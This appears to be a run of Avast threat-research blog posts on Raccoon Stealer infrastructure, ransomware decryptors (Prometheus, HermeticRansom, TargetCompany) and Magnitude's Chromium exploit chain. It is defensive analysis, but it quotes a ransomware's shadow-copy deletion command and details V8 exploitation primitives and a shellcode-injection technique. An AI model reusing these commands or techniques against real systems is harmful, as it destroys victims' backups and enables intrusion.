Servers used to download this software
We extracted unique links to other malware from the Raccoon configs received from C&Cs – 196 unique URLs in total. Some analysis results:
43% of the URLs use the HTTP scheme, 57% HTTPS.
83 domain names were used.
About 20% of the malware was hosted on the Discord CDN.
About 10% was served from aun3xk17k[.]space.
Conclusion
We will continue to monitor Raccoon Stealer’s activity, keeping an eye on new C&Cs, Telegram channels, and downloaded samples. We predict it may be used more widely by other cybercrime groups. We also expect the group behind Raccoon Stealer to keep developing new features, including support for stealing data from additional software and for bypassing the protections that software has in place.
Avast Releases Decryptor for the Prometheus Ransomware. Prometheus is a ransomware strain written in C# that inherited a lot of code from an older strain called Thanos.
Prometheus tries to thwart malware analysis by killing processes used for packet sniffing, debugging, or inspecting PE files. It then generates a random password that is used during the Salsa20 encryption.
Prometheus looks for available local drives to encrypt files that have one of the following extensions:
db dbf accdb dbx mdb mdf epf ndf ldf 1cd sdf nsf fp7 cat log dat txt jpeg gif jpg png php cs cpp rar zip html htm xlsx xls avi mp4 ppt doc docx sxi sxw odt hwp tar bz2 mkv eml msg ost pst edb sql odb myd php java cpp pas asm key pfx pem p12 csr gpg aes vsd odg raw nef svg psd vmx vmdk vdi lay6 sqlite3 sqlitedb java class mpeg djvu tiff backup pdf cert docm xlsm dwg bak qbw nd tlg lgb pptx mov xdw ods wav mp3 aiff flac m4a csv sql ora dtsx rdl dim mrimg qbb rtf 7z
Encrypted files are given a new extension .[ID-<PC-ID>].unlock. After the encryption process is completed, Notepad is executed with a ransom note from the file UNLOCK_FILES_INFO.txt informing victims on how to pay the ransom if they want to decrypt their files.
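The selection and renaming logic described above can be illustrated with a short sketch, using a representative subset of the extension list; the PC ID is a placeholder, as the real value is generated per machine:

```python
# Sketch of Prometheus's file selection and renaming scheme
# (representative subset of the targeted extensions listed above).
TARGETED = {".db", ".docx", ".xlsx", ".jpg", ".png", ".pdf", ".sql",
            ".zip", ".rar", ".txt", ".mp4", ".psd", ".bak", ".7z"}

def is_targeted(filename):
    """Check whether the file's extension is on the encryption list."""
    dot = filename.rfind(".")
    return dot != -1 and filename[dot:].lower() in TARGETED

def encrypted_name(filename, pc_id):
    """Apply the .[ID-<PC-ID>].unlock renaming; pc_id is a placeholder."""
    return f"{filename}.[ID-{pc_id}].unlock"

print(is_targeted("report.docx"))                  # True
print(is_targeted("driver.sys"))                   # False
print(encrypted_name("report.docx", "EXAMPLE01"))  # report.docx.[ID-EXAMPLE01].unlock
```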
How to use the Avast decryptor to decrypt files encrypted by Prometheus Ransomware
Run the executable file. It starts in the form of a wizard, which leads you through the configuration of the decryption process.
On the initial page, you can read the license information, if you want, but you really only need to click “Next”.
On the next page, select the list of locations you want to be searched and decrypted. By default, it contains a list of all local drives:
On the third page, you need to provide a file in its original form and encrypted by the Prometheus ransomware. Enter both names of the files. In case you have an encryption password created by a previous run of the decryptor, you can select the “I know the password for decrypting files” option:
The next page is where the password cracking process takes place. Click “Start” when you are ready to start the process. During the password cracking process, all your available processor cores will spend most of their computing power to find the decryption password. The cracking process may take a large amount of time, up to tens of hours. The decryptor periodically saves the progress and if you interrupt it and restart the decryptor later, it offers you the option to resume the previously started cracking process. Password cracking is only needed once per PC – no need to do it again for each file.
When the password is found, you can proceed to decrypt all encrypted files on your PC by clicking “Next”.
On the final page, you can opt in to backing up the encrypted files. These backups may help if anything goes wrong during the decryption process. We recommend leaving this option on, which is the default. After clicking “Decrypt”, the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files.
On February 24th, the Avast Threat Labs discovered a new ransomware strain accompanying the HermeticWiper data wiper, which our colleagues at ESET found circulating in Ukraine. Following this naming convention, we opted to name the strain we found piggybacking on the wiper HermeticRansom. According to analysis done by CrowdStrike’s Intelligence Team, the ransomware contains a weakness in its crypto schema and can be decrypted for free.
If your device has been infected with HermeticRansom and you’d like to decrypt your files, click here to skip to the section How to use the Avast decryptor to recover files.
Go!
The ransomware is written in Go. When executed, it searches local drives and network shares for potentially valuable files, looking for files with one of the extensions listed below (the order is taken from the sample):
In order to keep the victim’s PC operational, the ransomware avoids encrypting files in Program Files and Windows folders.
For every file designated for encryption, the ransomware creates a 32-byte encryption key. Files are encrypted by blocks, each block has 1048576 (0x100000) bytes. A maximum of nine blocks are encrypted. Any data past 9437184 bytes (0x900000) is left in plain text. Each block is encrypted by AES GCM symmetric cipher. After data encryption, the ransomware appends a file tail, containing the RSA-2048 encrypted file key. The public key is stored in the binary as a Base64 encoded string:
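The partial-encryption layout (up to nine 1 MiB AES-GCM blocks, everything past offset 0x900000 left in plain text) can be sketched as:

```python
# Which byte ranges of a file HermeticRansom encrypts; the rest stays
# in plain text.
BLOCK_SIZE = 0x100000  # 1,048,576 bytes per AES-GCM block
MAX_BLOCKS = 9         # at most nine blocks are encrypted

def encrypted_ranges(file_size):
    """Return the (start, end) byte ranges that get encrypted."""
    ranges = []
    for i in range(MAX_BLOCKS):
        start = i * BLOCK_SIZE
        if start >= file_size:
            break
        ranges.append((start, min(start + BLOCK_SIZE, file_size)))
    return ranges

# A 12 MiB file: only the first 9 MiB (0x900000 = 9437184 bytes) are encrypted.
ranges = encrypted_ranges(12 * 0x100000)
print(len(ranges), ranges[-1])  # 9 (8388608, 9437184)
```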
When done, a file named “read_me.html” is saved to the user’s Desktop folder:
There is an interesting number of politically oriented strings in the ransomware binary. In addition to the file extension referring to the re-election of Joe Biden in 2024, there is also a reference to him in the project name:
During execution, the ransomware creates a large number of child processes that do the actual encryption:
How to use the Avast decryptor to recover files
To decrypt your files, please, follow these steps:
Simply run the executable file. It starts in the form of a wizard, which leads you through the configuration of the decryption process.
On the initial page, you can read the license information, if you want, but you really only need to click “Next“
On the next page, select the list of locations which you want to be searched and decrypted. By default, it contains a list of all local drives:
On the final wizard page, you can opt in to backing up the encrypted files. These backups may help if anything goes wrong during the decryption process. We recommend leaving this option on, which is the default. After clicking “Decrypt”, the decryption process begins. Let the decryptor work and wait until it finishes.
On January 25, 2022, a victim of a ransomware attack reached out to us for help. The extension of the encrypted files and the ransom note indicated the TargetCompany ransomware (not related to Target the store), which can be decrypted under certain circumstances.
Modus Operandi of the TargetCompany Ransomware
When executed, the ransomware takes several actions to ease its own malicious work:
Assigns the SeTakeOwnershipPrivilege and SeDebugPrivilege for its process
Deletes special file execution options for tools like vssadmin.exe, wmic.exe, wbadmin.exe, bcdedit.exe, powershell.exe, diskshadow.exe, net.exe and taskkil.exe
Removes shadow copies on all drives using this command: %windir%\sysnative\vssadmin.exe delete shadows /all /quiet
Kills some processes that may hold open valuable files, such as databases:
List of processes killed by the TargetCompany ransomware
MsDtsSrvr.exe
ntdbsmgr.exe
ReportingServecesService.exe
oracle.exe
fdhost.exe
sqlserv.exe
fdlauncher.exe
sqlservr.exe
msmdsrv.exe
sqlwrite
mysql.exe
After these preparations, the ransomware gets the mask of all logical drives in the system using the GetLogicalDrives() Win32 API. Each drive’s type is then checked with GetDriveType(). If the drive is valid (fixed, removable, or network), encryption of that drive proceeds: first, the drive is populated with the ransom note file (named RECOVERY INFORMATION.txt), and once this task is complete, the actual encryption begins.
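The drive-enumeration step maps to a small sketch; decoding the bitmask mirrors what GetLogicalDrives() returns (bit 0 = A:, bit 1 = B:, and so on). The GetDriveType() filtering is only indicated in a comment, since it requires Windows:

```python
import string

def drives_from_mask(mask):
    """Decode a GetLogicalDrives()-style bitmask into drive letters."""
    return [f"{letter}:\\" for i, letter in enumerate(string.ascii_uppercase)
            if mask & (1 << i)]

# Bits 0 and 2 set -> drives A: and C: are present.
print(drives_from_mask(0b101))  # ['A:\\', 'C:\\']

# In the real sample, each returned drive is further checked with
# GetDriveType(), and only fixed, removable, and network drives proceed
# to encryption.
```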
Exceptions
To keep the infected PC working, TargetCompany avoids encrypting certain folders and file types:
List of folders avoided by the TargetCompany ransomware
msocache
boot
Microsoft Security Client
Microsoft MPI
$windows.~ws
$windows.~bt
Internet Explorer
Windows Kits
system volume information
mozilla
Reference
Microsoft.NET
intel
boot
Assemblies
Windows Mail
appdata
windows.old
Windows Defender
Microsoft Security Client
perflogs
Windows
Microsoft ASP.NET
Package Store
programdata
google
application data
WindowsPowerShell
Core Runtime
Microsoft Analysis Services
tor browser
Windows NT
Package
Windows Portable Devices
Windows
Store
Windows Photo Viewer
Common Files
Microsoft Help Viewer
Windows Sidebar
List of file types avoided by the TargetCompany ransomware
.386
.cpl
.exe
.key
.msstyles
.rtp
.adv
.cur
.hlp
.lnk
.msu
.scr
.ani
.deskthemepack
.hta
.lock
.nls
.shs
.bat
.diagcfg
.icl
.mod
.nomedia
.spl
.cab
.diagpkg
.icns
.mpa
.ocx
.sys
.cmd
.diangcab
.ico
.msc
.prf
.theme
.com
.dll
.ics
.msi
.ps1
.themepack
.drv
.idx
.msp
.rom
.wpx
The ransomware generates an encryption key for each file (0x28 bytes). This key is split into a ChaCha20 encryption key (0x20 bytes) and a nonce (0x08 bytes). After the file is encrypted, the key is protected by a combination of Curve25519 elliptic curve + AES-128 and appended to the end of the file. The scheme below illustrates the file encryption; red-marked parts show the values that are saved into the file tail after the file data is encrypted:
The exact structure of the file tail, appended to the end of each encrypted file, is shown as a C-style structure:
Every folder with an encrypted file contains the ransom note file. A copy of the ransom note is also saved into c:\HOW TO RECOVER !!.TXT
The personal ID mentioned in the file is the first six bytes of the personal_id stored in each encrypted file.
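The per-file key handling can be sketched as follows (an illustrative sketch, not code from the sample; the ChaCha20 encryption itself is omitted):

```python
import os

KEY_BLOB_SIZE = 0x28    # per-file key material generated by the ransomware
CHACHA_KEY_SIZE = 0x20  # ChaCha20 encryption key
NONCE_SIZE = 0x08       # nonce

def split_file_key(blob):
    """Split the 0x28-byte per-file blob into a ChaCha20 key and a nonce."""
    assert len(blob) == KEY_BLOB_SIZE
    return blob[:CHACHA_KEY_SIZE], blob[CHACHA_KEY_SIZE:]

key, nonce = split_file_key(os.urandom(KEY_BLOB_SIZE))
print(len(key), len(nonce))  # 32 8

# The "personal ID" shown in the ransom note is just the first six bytes
# of the personal_id value stored in each encrypted file.
personal_id = os.urandom(0x10)  # illustrative; the real value comes from the sample
short_id = personal_id[:6]
```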
How to use the Avast decryptor to recover files
To decrypt your files, please, follow these steps:
Download the free Avast decryptor. Choose a build that corresponds with your Windows installation. The 64-bit version is significantly faster and most of today’s Windows installations are 64-bit.
If you have 64-bit Windows, choose the 64-bit build.
If you have 32-bit Windows, choose the 32-bit build.
Simply run the executable file. It starts in the form of a wizard, which leads you through the configuration of the decryption process.
On the initial page, you can read the license information, if you want, but you really only need to click “Next”
On the next page, select the list of locations which you want to be searched and decrypted. By default, it contains a list of all local drives:
On the third page, you need to enter the name of a file encrypted by the TargetCompany ransomware. In case you have an encryption password created by a previous run of the decryptor, you can select the “I know the password for decrypting files” option:
The next page is where the password cracking process takes place. Click “Start” when you are ready to start the process. During password cracking, all your available processor cores will spend most of their computing power to find the decryption password. The cracking process may take a large amount of time, up to tens of hours. The decryptor periodically saves the progress and if you interrupt it and restart the decryptor later, it offers you an option to resume the previously started cracking process. Password cracking is only needed once per PC – no need to do it again for each file.
When the password is found, you can proceed to the decryption of files on your PC by clicking “Next”.
On the final wizard page, you can opt-in whether you want to backup encrypted files. These backups may help if anything goes wrong during the decryption process. This option is turned on by default, which we recommend. After clicking “Decrypt”, the decryption process begins. Let the decryptor work and wait until it finishes.
In October 2021, we discovered that the Magnitude exploit kit was testing out a Chromium exploit chain in the wild. This really piqued our interest, because browser exploit kits have in the past few years focused mainly on Internet Explorer vulnerabilities and it was believed that browsers like Google Chrome are just too big of a target for them.
We’ve been monitoring the exploit kit landscape very closely since our discoveries, watching out for any new developments. We were waiting for other exploit kits to jump on the bandwagon but, as far as we can tell, none did. What’s more, Magnitude seems to have abandoned the Chromium exploit chain. And while Underminer still uses these exploits today, its traditional IE exploit chains are doing much better: according to our telemetry, less than 20% of Underminer’s exploitation attempts target Chromium-based browsers.
This is some very good news because it suggests that the Chromium exploit chains were not as successful as the attackers hoped and that it is not currently very profitable for exploit kit developers to target Chromium users. In this blog post, we would like to offer some thoughts on why that could be the case and why the attackers might have wanted to develop these exploits in the first place. And since we don’t get to see a new Chromium exploit chain in the wild every day, we will also dissect Magnitude’s exploits and share some detailed technical information about them.
Exploit Kit Theory
To understand why exploit kit developers might have wanted to test Chromium exploits, let’s first look at things from their perspective. Their end goal in developing and maintaining an exploit kit is to make a profit: they just simply want to maximize the difference between money “earned” and money spent. To achieve this goal, most modern exploit kits follow a simple formula. They buy ads targeted to users who are likely to be vulnerable to their exploits (e.g. Internet Explorer users). These ads contain JavaScript code that is automatically executed, even when the victim doesn’t interact with the ad in any way (sometimes referred to as drive-by attacks). This code can then further profile the victim’s browser environment and select a suitable exploit for that environment. If the exploitation succeeds, a malicious payload (e.g. ransomware or a coinminer) is deployed to the victim. In this scenario, the money “earned” could be the ransom or mining rewards. On the other hand, the money spent is the cost of ads, infrastructure (renting servers, registering domain names etc.), and the time the attacker spends on developing and maintaining the exploit kit.
The attackers would like to have many diverse exploits ready at any given time because it would allow them to cast a wide net for potential victims. But it is important to note that individual exploits generally get less effective over time. This is because the number of people susceptible to a known vulnerability will decrease as some people patch and other people upgrade to new devices (which are hopefully not plagued by the same vulnerabilities as their previous devices). This forces the attackers to always look for new vulnerabilities to exploit. If they stick with the same set of exploits for years, their profit would eventually reduce down to almost nothing.
So how do they find the right vulnerabilities to exploit? After all, there are thousands of CVEs reported each year, but only a few of them are good candidates for being included in an exploit kit. Weaponizing an exploit generally takes a lot of time (unless, of course, there is a ready-to-use PoC or the exploit can be stolen from a competitor), so the attackers might first want to carefully take into account multiple characteristics of each vulnerability. If a vulnerability scores well across these characteristics, it looks like a good candidate for inclusion in an exploit kit. Some of the more important characteristics are listed below.
Prevalence of the vulnerability – The more users are affected by the vulnerability, the more attractive it is to the attackers.
Exploit reliability – Many exploits rely on assumptions or are based on a race condition, which makes them fail some of the time. The attackers obviously prefer high-reliability exploits.
Difficulty of exploit development – This determines the time that needs to be spent on exploit development (if the attackers are even capable of exploiting the vulnerability). The attackers tend to prefer vulnerabilities with a public PoC exploit, which they can often integrate into their exploit kit with minimal effort.
Targeting precision – The attackers care about how hard it is to identify (and target ads to) vulnerable victims. If they misidentify victims too often (serving exploits to victims they cannot exploit), they lose money on the malvertising.
Expected vulnerability lifetime – As already discussed, each vulnerability gets less effective over time. However, the speed at which the effectiveness drops can vary a lot between vulnerabilities, mostly based on how effective the patching process of the affected software is.
Exploit detectability – The attackers have to deal with numerous security solutions that are in the business of protecting their users against exploits. These solutions can lower the exploit kit’s success rate by a lot, which is why the attackers prefer stealthier exploits that are harder for defenders to detect.
Exploit potential – Some exploits give the attackers SYSTEM privileges, while others might only land them inside a sandbox. Exploits with less potential are also less useful, because they either need to be chained with additional LPE exploits, or they place limits on what the final malicious payload is able to do.
Looking at these characteristics, the most plausible explanation for the failure of the Chromium exploit chains is the expected vulnerability lifetime. Google is extremely good at forcing users to install browser patches: Chrome updates are pushed to users when they’re ready and can happen many times in a month (unlike e.g. Internet Explorer updates which are locked into the once-a-month “Patch Tuesday” cycle that is only broken for exceptionally severe vulnerabilities). When CVE-2021-21224 was a zero-day vulnerability, it affected billions of users. Within a few days, almost all of these users received a patch. The only unpatched users were those who manually disabled (or broke) automatic updates, those who somehow managed not to relaunch the browser in a long time, and those running Chromium forks with bad patching habits.
A secondary reason for the failure could be attributed to bad targeting precision. Ad networks often allow the attackers to target ads based on various characteristics of the user’s browser environment, but the specific version of the browser is usually not one of these characteristics. For Internet Explorer vulnerabilities, this does not matter that much: the attackers can just buy ads for Internet Explorer users in general. As long as a certain percentage of Internet Explorer users is vulnerable to their exploits, they will make a profit. However, if they just blindly targeted Google Chrome users, the percentage of vulnerable victims might be so low, that the cost of malvertising would outweigh the money they would get by exploiting the few vulnerable users. Google also plans to reduce the amount of information given in the User-Agent string. Exploit kits often heavily rely on this string for precise information about the browser version. With less information in the User-Agent header, they might have to come up with some custom version fingerprinting, which would most likely be less accurate and costly to manage.
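As an illustration of how fragile this User-Agent-based fingerprinting is, extracting the browser version is currently a one-liner (a hedged sketch; real kits inspect many more environment properties, and the example UA string below is ours):

```python
import re

def chrome_major(user_agent):
    """Extract the Chrome major version from a User-Agent string, or None."""
    m = re.search(r"Chrome/(\d+)\.", user_agent)
    return int(m.group(1)) if m else None

ua = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36")
print(chrome_major(ua))  # 89
```

With a reduced User-Agent, this major-version field is about all that remains, which is why precise vulnerable-version targeting would require costlier custom fingerprinting.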
Now that we have some context about exploit kits and Chromium, we can finally speculate about why the attackers decided to develop the Chromium exploit chains. First of all, adding new vulnerabilities to an exploit kit seems a lot like a “trial and error” activity. While the attackers might have some expectations about how well a certain exploit will perform, they cannot know for sure how useful it will be until they actually test it out in the wild. This means it should not be surprising that sometimes, their attempts to integrate an exploit turn out worse than they expected. Perhaps they misjudged the prevalence of the vulnerabilities or thought that it would be easier to target the vulnerable victims. Perhaps they focused too much on the characteristics that the exploits do well on: after all, they have reliable, high-potential exploits for a browser that’s used by billions. It could also be that this was all just some experimentation where the attackers just wanted to explore the land of Chromium exploits.
It’s also important to point out that the usage of Internet Explorer (which is currently vital for the survival of exploit kits) has been steadily dropping over the past few years. This may have forced the attackers to experiment with how viable exploits for other browsers are because they know that sooner or later they will have to make the switch. But judging from these attempts, the attackers do not seem fully capable of making the switch as of now. That is some good news because it could mean that if nothing significant changes, exploit kits might be forced to retire when Internet Explorer usage drops below some critical limit.
CVE-2021-21224
Let’s now take a closer look at Magnitude’s exploit chain that we discovered in the wild. The exploitation starts with a JavaScript exploit for CVE-2021-21224. This is a type confusion vulnerability in V8, which allows the attacker to execute arbitrary code within a (sandboxed) Chromium renderer process. A zero-day exploit for this vulnerability (or issue 1195777, as it was known back then, since no CVE ID had been assigned yet) was dumped on GitHub on April 14, 2021. The exploit worked for a couple of days against the latest Chrome version, until Google rushed out a patch about a week later.
It should not be surprising that Magnitude’s exploit is heavily inspired by the PoC on GitHub. However, while both Magnitude’s exploit and the PoC follow a very similar exploitation path, there are no matching code pieces, which suggests that the attackers didn’t resort that much to the “Copy/Paste” technique of exploit development. In fact, Magnitude’s exploit looks like a more cleaned-up and reliable version of the PoC. And since there is no obfuscation employed (the attackers probably meant to add it in later), the exploit is very easy to read and debug. There are even very self-explanatory function names, such as confusion_to_oob, addrof, and arb_write, and variable names, such as oob_array, arb_write_buffer, and oob_array_map_and_properties. The only way this could get any better for us researchers would be if the authors left a couple of helpful comments in there…
Interestingly, some parts of the exploit also seem inspired by a CTF writeup for a “pwn” challenge from *CTF 2019, in which the players were supposed to exploit a made-up vulnerability that was introduced into a fork of V8. While CVE-2021-21224 is obviously a different (and actual, rather than made-up) vulnerability, many of the techniques outlined in that writeup apply to V8 exploitation in general and so are used in the later stages of Magnitude’s exploit, sometimes with the very same variable names as those used in the writeup.
The root cause of the vulnerability is incorrect integer conversion during the SimplifiedLowering phase. This incorrect conversion is triggered in the exploit by the Math.max call, shown in the code snippet above. As can be seen, the exploit first calls foofunc in a loop 0x10000 times. This is to make V8 compile that function because the bug only manifests itself after JIT compilation. Then, helper["gcfunc"] gets called. The purpose of this function is just to trigger garbage collection. We tested that the exploit also works without this call, but the authors probably put it there to improve the exploit’s reliability. Then, foofunc is called one more time, this time with flagvar=true, which makes xvar=0xFFFFFFFF. Without the bug, lenvar should now evaluate to -0xFFFFFFFF and the next statement should throw a RangeError because it should not be possible to create an array with a negative length. However, because of the bug, lenvar evaluates to an unexpected value of 1. The reason for this is that the vulnerable code incorrectly converts the result of Math.max from an unsigned 32-bit integer 0xFFFFFFFF to a signed 32-bit integer -1. After constructing vuln_array, the exploit calls Array.prototype.shift on it. Under normal circumstances, this method should remove the first element from the array, so the length of vuln_array should be zero. However, because of the disparity between the actual and the predicted value of lenvar, V8 makes an incorrect optimization here and just puts the 32-bit constant 0xFFFFFFFF into Array.length (this is computed as 0-1 with an unsigned 32-bit underflow, where 0 is the predicted length and -1 signifies Array.prototype.shift decrementing Array.length).
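The broken conversion is easiest to see outside V8. Below is a minimal C++ analogy (not the actual V8 lowering code) of what the buggy SimplifiedLowering phase effectively does to the Math.max result before negating it:

```cpp
#include <cassert>
#include <cstdint>

// The buggy lowering truncates the unsigned 32-bit Math.max result to a
// signed 32-bit integer *before* the negation, so 0xFFFFFFFF becomes -1
// and -(-1) yields the unexpected array length of 1.
// (Avoid INT32_MIN inputs: negating it would be undefined behavior here.)
int32_t buggy_len(uint32_t max_result) {
    return -static_cast<int32_t>(max_result);
}
```

With the correct 64-bit interpretation, `buggy_len(0xFFFFFFFF)` would be -4294967295 and the array constructor would throw a RangeError; the truncation turns it into 1 instead.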
Now, the attackers have successfully crafted a JSArray with a corrupted Array.length, which allows them to perform out-of-bounds memory reads and writes. The very first out-of-bounds memory write can be seen in the last statement of the confusion_to_oob function. The exploit here writes 0xc00c to vuln_array[0x10]. This abuses the deterministic memory layout in V8 when a function creates two local arrays. Since vuln_array was created first, oob_array is located at a known offset from it in memory and so by making out-of-bounds memory accesses through vuln_array, it is possible to access both the metadata and the actual data of oob_array. In this case, the element at index 0x10 corresponds to offset 0x40, which is where Array.length of oob_array is stored. The out-of-bounds write therefore corrupts the length of oob_array, so it is now also possible to read and write past its end.
Next, the exploit constructs the addrof and fakeobj exploit primitives. These are well-known and very powerful primitives in the world of JavaScript engine exploitation. In a nutshell, addrof leaks the address of a JavaScript object, while fakeobj creates a new, fake object at a given address. Having constructed these two primitives, the attacker can usually reuse existing techniques to get to their ultimate goal: arbitrary code execution.
Both primitives are constructed in a similar way, abusing the fact that vuln_array[0x7] and oob_array[0] point to the very same memory location. It is important to note here that vuln_array is internally represented by V8 as HOLEY_ELEMENTS, while oob_array is PACKED_DOUBLE_ELEMENTS (for more information about internal array representation in V8, please refer to this blog post by the V8 devs). This makes it possible to write an object into vuln_array and read it (or more precisely, the pointer to it) from the other end in oob_array as a double. This is exactly how addrof is implemented, as can be seen above. Once the address is read, it is converted using helper["f2ifunc"] from double representation into an integer representation, with the upper 32 bits masked out, because the double takes 64 bits, while pointers in V8 are compressed down to just 32 bits. fakeobj is implemented in the same fashion, just the other way around. First, the pointer is converted into a double using helper["i2ffunc"]. The pointer, encoded as a double, is then written into oob_array[0] and then read from vuln_array[0x7], which tricks V8 into treating it as an actual object. Note that there is no masking needed in fakeobj because the double written into oob_array is represented by more bits than the pointer read from vuln_array.
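The double/pointer type-punning trick can be illustrated outside V8. A hedged C++ analogy of the conversion helpers (the names f2ifunc/i2ffunc come from the exploit; the logic here is reconstructed from the description above):

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>

// f2ifunc direction: read the raw bits of a 64-bit double and mask off
// the upper 32 bits, because V8's compressed pointers are only 32 bits.
uint32_t f2i(double d) {
    uint64_t bits;
    std::memcpy(&bits, &d, sizeof(bits));
    return static_cast<uint32_t>(bits & 0xFFFFFFFFull);
}

// i2ffunc direction: place a 32-bit "pointer" into the low bits of a
// double. No masking is needed on this path, as the post notes, because
// the 64-bit double fully contains the 32-bit value.
double i2f(uint32_t ptr) {
    uint64_t bits = ptr;
    double d;
    std::memcpy(&d, &bits, sizeof(d));
    return d;
}
```

Round-tripping a value through i2f and f2i preserves it, which is exactly what lets the exploit smuggle pointers through oob_array's double elements.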
With addrof and fakeobj in place, the exploit follows a fairly standard exploitation path, which seems heavily inspired by the aforementioned *CTF 2019 writeup. The next primitives constructed by the exploit are arbitrary read/write. To achieve these primitives, the exploit fakes a JSArray (aptly named fake in the code snippet above) in such a way that it has full control over its metadata. It can then overwrite the fake JSArray’s elements pointer, which points to the address where the actual elements of the array get stored. Corrupting the elements pointer allows the attackers to point the fake array to an arbitrary address, and it is then subsequently possible to read/write to that address through reads/writes on the fake array.
Let’s look at the implementation of the arbitrary read/write primitive in a bit more detail. The exploit first calls the get_arw function to set up the fake JSArray. This function starts by using an overread on oob_array[3] in order to leak map and properties of oob_array (remember that the original length of oob_array was 3 and that its length got corrupted earlier). The map and properties point to structures that basically describe the object type in V8. Then, a new array called point_array gets created, with the oob_array_map_and_properties value as its first element. Finally, the fake JSArray gets constructed at offset 0x20 before point_array. This offset was carefully chosen, so that the JSArray structure corresponding to fake overlaps with elements of point_array. Therefore, it is possible to control the internal members of fake by modifying the elements of point_array. Note that elements in point_array take 64 bits, while members of the JSArray structure usually only take 32 bits, so modifying one element of point_array might overwrite two members of fake at the same time. Now, it should make sense why the first element of point_array was set to oob_array_map_and_properties. The first element is at the same address where V8 would look for the map and properties of fake. By initializing it like this, fake is created to be a PACKED_DOUBLE_ELEMENTS JSArray, basically inheriting its type from oob_array.
The second element of point_array overlaps with the elements pointer and Array.length of fake. The exploit uses this for both arbitrary read and arbitrary write, first corrupting the elements pointer to point to the desired address and then reading/writing to that address through fake[0]. However, as can be seen in the exploit code above, there are some additional actions taken that are worth explaining. First of all, the exploit always makes sure that addrvar is an odd number. This is because V8 expects pointers to be tagged, with the least significant bit set. Then, there is the addition of 2<<32 to addrvar. As was explained before, the second element of point_array takes up 64 bits in memory, while the elements pointer and Array.length both take up only 32 bits. This means that a write to point_array[1] overwrites both members at once and the 2<<32 just simply sets the Array.length, which is controlled by the most significant 32 bits. Finally, there is the subtraction of 8 from addrvar. This is because the elements pointer does not point straight to the first element, but instead to a FixedDoubleArray structure, which takes up eight bytes and precedes the actual element data in memory.
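Put together, the three adjustments could be sketched like this (a hypothetical C++ helper mirroring the arithmetic described above, not code lifted from the exploit):

```cpp
#include <cassert>
#include <cstdint>

// Encode a target address into the 64-bit value written to
// point_array[1]: set the tag bit V8 expects on pointers, back up over
// the 8-byte FixedDoubleArray header preceding the element data, and
// pack Array.length = 2 into the upper 32 bits of the element.
uint64_t encode_elements_entry(uint32_t addr) {
    uint32_t tagged   = addr | 1;      // V8 expects tagged (odd) pointers
    uint32_t elements = tagged - 8;    // skip the FixedDoubleArray header
    return (uint64_t(2) << 32) | elements; // high half sets Array.length
}
```

Subtracting 8 from an odd value keeps it odd, so the tag bit survives the header adjustment.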
The final step taken by the exploit is converting the arbitrary read/write primitive into arbitrary code execution. For this, it uses a well-known trick that takes advantage of WebAssembly. When V8 JIT-compiles a WebAssembly function, it places the compiled code into memory pages that are both writable and executable (there now seem to be some new mitigations that aim to prevent this trick, but it is still working against V8 versions vulnerable to CVE-2021-21224). The exploit can therefore locate the code of a JIT-compiled WebAssembly function, overwrite it with its own shellcode and then call the original WebAssembly function from Javascript, which executes the shellcode planted there.
Magnitude’s exploit first creates a dummy WebAssembly module that contains a single function called main, which just returns the number 42 (the original code of this function doesn’t really matter because it will get overwritten with the shellcode anyway). Using a combination of addrof and arb_read, the exploit obtains the address where V8 JIT-compiled the function main. Interestingly, it then constructs a whole new arbitrary write primitive using an ArrayBuffer with a corrupted backing store pointer and uses this newly constructed primitive to write shellcode to the address of main. While it could theoretically use the first arbitrary write primitive to place the shellcode there, it chooses this second method, most likely because it is more reliable. It seems that the first method might crash V8 under some rare circumstances, which makes it not practical for repeated use, such as when it gets called thousands of times to write a large shellcode buffer into memory.
There are two shellcodes embedded in the exploit. The first one contains an exploit for CVE-2021-31956. This one gets executed first and its goal is to steal the SYSTEM token to elevate the privileges of the current process. After the first shellcode returns, the second shellcode gets planted inside the JIT-compiled WebAssembly function and executed. This second shellcode injects Magniber ransomware into some already running process and lets it encrypt the victim’s drives.
CVE-2021-31956
Let’s now turn our attention to the second exploit in the chain, which Magnitude uses to escape the Chromium sandbox. This is an exploit for CVE-2021-31956, a paged pool buffer overflow in the Windows kernel. It was discovered in June 2021 by Boris Larin from Kaspersky, who found it being used as a zero-day in the wild as a part of the PuzzleMaker attack. The Kaspersky blog post about PuzzleMaker briefly describes the vulnerability and the way the attackers chose to exploit it. However, much more information about the vulnerability can be found in a two-part blog series by Alex Plaskett from NCC Group. This blog series goes into great detail and pretty much provides a step-by-step guide on how to exploit the vulnerability. We found that the attackers behind Magnitude followed this guide very closely, even though there are certainly many other approaches that they could have chosen for exploitation. This shows yet again that publishing vulnerability research can be a double-edged sword. While the blog series certainly helped many defend against the vulnerability, it also made it much easier for the attackers to weaponize it.
The vulnerability lies in ntfs.sys, inside the function NtfsQueryEaUserEaList, which is directly reachable from the syscall NtQueryEaFile. This syscall internally allocates a temporary buffer on the paged pool (the size of which is controllable by a syscall parameter) and places there the NTFS Extended Attributes associated with a given file. Individual Extended Attributes are separated by a padding of up to four bytes. By making the padding start directly at the end of the allocated pool chunk, it is possible to trigger an integer underflow which results in NtfsQueryEaUserEaList writing subsequent Extended Attributes past the end of the pool chunk. The idea behind the exploit is to spray the pool so that chunks containing certain Windows Notification Facility (WNF) structures can be corrupted by the overflow. Using some WNF magic that will be explained later, the exploit gains an arbitrary read/write primitive, which it uses to steal the SYSTEM token.
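A simplified illustration of this bug class (emphatically not the actual ntfs.sys code) shows how alignment padding can make an unsigned length check underflow:

```cpp
#include <cassert>
#include <cstdint>

// Sizes are tracked as unsigned 32-bit values. When the 4-byte
// alignment padding pushes the "consumed" size past the remaining
// buffer size, the unsigned subtraction underflows to a huge value,
// and a later bounds check that trusts this value lets subsequent
// entries be written past the end of the pool chunk.
uint32_t remaining_after(uint32_t remaining, uint32_t entry_size) {
    uint32_t aligned = (entry_size + 3) & ~3u; // pad the entry to 4 bytes
    return remaining - aligned;                // underflows if aligned > remaining
}
```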
The exploit starts by checking the victim’s Windows build number. Only builds 18362, 18363, 19041, and 19042 (19H1 – 20H2) are supported, and the exploit bails out if it finds itself running on a different build. The build number is then used to determine proper offsets into the _EPROCESS structure as well as to determine correct syscall numbers, because syscalls are invoked directly by the exploit, bypassing the usual syscall stubs in ntdll.
